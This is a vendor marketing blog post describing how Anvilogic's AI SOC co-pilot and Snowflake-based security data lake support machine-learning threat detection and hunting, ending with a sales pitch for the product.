Leveraging AI to Manage Data Cybersecurity Workloads on Snowflake

Leveraging AI to Manage Data Cybersecurity Workloads on Snowflake

Collaboration
Share:

The content in this article is part of Episode 8 of the Detection Engineering Dispatch series, presented by Mike Hart, Principal Data Scientist at Anvilogic.

In big data systems, management involves handling diversified data sources, which produces millions of events that require monitoring for potential cybersecurity threats. 

Data cloud platforms like Snowflake have scalable, cost-effective storage, seamless data sharing, and powerful computing capabilities for security operations teams to manage data in a data platform—functioning like a security data lake. However, the true potential of data lakes for security operations teams is unlocked when combined with the power of AI to delight and educate security teams in ways that otherwise would have not been possible or scalable using a traditional SIEM. 

Anvilogic works as a multi-data platform SIEM across Splunk and Snowflake giving security operations teams the freedom to adopt a scalable security data lake without ripping and replacing their existing security investments. By leveraging AI alongside Snowflake, Anvilogic helps you process, analyze, and draw insights from cybersecurity workloads for more scalable and cost-effective detection and response. A SOC co-pilot replaces traditional data analysis methods and applies advanced machine learning techniques to refine data processing, making end users more efficient by spending less time on mundane and repetitive tasks. 

To get a better idea of how it works, read this guide. 

Using Your Security Data Lake

Integrating your security data lake into a seamless architecture using Anvilogic’s SOC co-pilot reduces costs, speeds up detection, and improves security coverage. 

When you integrate your data lake, the SOC co-pilot processes detections through machine learning after their initial identification. This way, you efficiently scale large data workloads while filtering out extraneous noise by leveraging AI. 

A practical way to demonstrate this is using large language models running on Snowflake like Anvilogic’s MonteAI chatbot to drive complex investigations, such as identifying malicious PowerShell scripts.

This strategy mitigates the pitfalls of manual detection engineering, which often involves personnel and disjointed platforms. As a result, it also prevents slow and poorly correlated processes. 

Decoupling the analytics and logging layers allows you to move away from expensive, monolithic SIEMs while deploying detections easily across various data platforms – effectively democratizing the detection process across all your data lakes. 

Integration through APIs from various vendors further streamlines this process and normalizes detections without specialized coding or tool expertise. 

Now that you know the benefits of integrating security data lakes with a SOC co-pilot, here’s a comparison between the AI approach and the traditional way of managing data workloads:

Decoupling Security Analytics from Logging Platforms

Adopting a decoupled architecture allows you to build out detections while keeping your data within its native environment. Here, you can use your specific data lake's inherent mechanisms to generate detections. 

Let’s say you’re using an object store like Amazon S3 to store the security data and detections. Then, employing tools like Snowflake's Snowpipe—a data ingestion tool—loads these detections into event tables within Snowflake.

Once in Snowflake, the process simplifies: you have a single platform for running your ML models. Now, you won’t have to juggle multiple data platforms or manage different vendor systems and have all relevant events across all your data lakes in one place for correlation and remediation. 

This approach simplifies data management and improves your ability to integrate data from various sources like CrowdStrike, Wiz, or Azure Sentinel. Creating integrations within Snowflake allows you to run your models effectively and have a clear vantage point to generate insights. 

Based on the insights gathered, you can easily transition into further actions from this unified platform, such as triage or threat-hunting scenarios and detection.

Machine Learning for Threat Detection and Engineering

You'll face particular challenges when applying machine learning to threat detection and response. 

One primary challenge is scaling—which requires diverse approaches, like unsupervised or supervised learning and natural language processing. These techniques help normalize and extract relevant data, crucial in a field where attacks often manifest as anomalies amidst benign events.

Understanding the attacker's persona helps you to create better AI systems for spotting security threats and integrating your detection team’s feedback. Rapidly deploying these insights back into the system keeps you ahead of evolving threats. 

Be aware that false positives are a concern—your goal is to minimize alert fatigue. Ensure the models effectively serve as co-pilots, leading you to the most significant alerts.

Snowflake streamlines MLOps pipeline management. It simplifies the detection process from repository management (e.g. Bitbucket, GitHub) to running ML pipelines. It also handles large-scale data sets, employing tools like MapReduce for effective ETL processes. 

After all, Snowflake's flexibility in handling various libraries and its UI capabilities make it an excellent choice for presenting results. It assists partners like your threat research team conduct ad hoc queries easily and quickly.

Now that you know how to tackle challenges in threat detection using machine learning, consider how to practically apply machine learning with user-defined functions (UDFs) in Snowflake. 

Encapsulating ML Inference in User-Defined Functions

For diverse cybersecurity challenges, you can apply machine learning inference in user-defined functions (UDFs). Specific problems require specific libraries. For example, XGBoost excels in classification tasks, while TensorFlow or PyTorch enable deep learning and language modeling. 

Encapsulating these libraries in Snowflake UDFs or with the new Snowpark ML Ops streamlines unit testing and model loader reuse. This keeps models in Snowflake's file system and avoids dependency management issues and customization for each task.

It also allows smaller instance use, saving costs without affecting model performance. You can choose different libraries and register the UDFs in Snowflake to monitor their performance. This ensures the production of high-quality, actionable alerts from machine learning models.

To evaluate your machine learning models and ensure they generate high-fidelity alerts, here’s what you should do:

  • Start with a dataset that accurately represents the intended threats. 
  • Balance true positives with acceptable false positive rates. 
  • Use internal review feedback to refine models before customer deployment. 
  • Regularly monitor to address potential data drifts. 
Leveraging AI for Threat Hunting to Scale Large Data Workloads

You extract various entities from the detections to hunt threats, such as IP domains, URLs, executables, and command line arguments. This is essential, especially when data from your data lakes isn't fully parsed. Sometimes, crucial information within the process field might be overlooked, like specific Windows security event logs. 

To address this, use text classification with LLMs to identify malicious URLs and employ deep neural networks (DNNs) to detect malicious PowerShell activities.

Deep anomaly detection techniques also come into play for spotting unusual executions in run DLLs and scheduled tasks. Beyond these advanced methods, expert rules based on simple 'if-then' statements are applied to domain IP metadata. 

This approach is effective, especially when tracking traffic that originates from or is directed to regions known for lax regulations and frequent cyber attacks. These models, combined with your expert rules, form the foundation of your threat-hunting strategy.

Break Free From SIEM Lock-In and Save Up to 80% on Costs With Anvilogic

Security operations teams struggle to detect high-risk threats in their environment while managing spiraling SIEM costs. Vendor lock-in prevents them from adopting more scalable security data lakes like Snowflake that could address both of these challenges. Anvilogic is trailblazing the solution to this challenge with our multi-data platform SIEM that works across your Splunk, Snowflake and Azure data platforms. This gives security teams the freedom to choose the best data platform for their security use cases without the need to rip and replace their existing security investments.

Book a personalized demo today to learn how Anvilogic can help you cut SIEM costs without a rip-and-replace, reduce risk by closing detection gaps across Splunk and Snowflake, and adopt a SOC co-pilot that works across your data platforms.

Chat with our team to receive a free maturity assessment

Get in Touch

Ready to learn more about Anvilogic?

Kickstart your security operations

Anvilogic provided the necessary threat detection automation for our small SOC, adding a significant force-multiplier advantage for my team.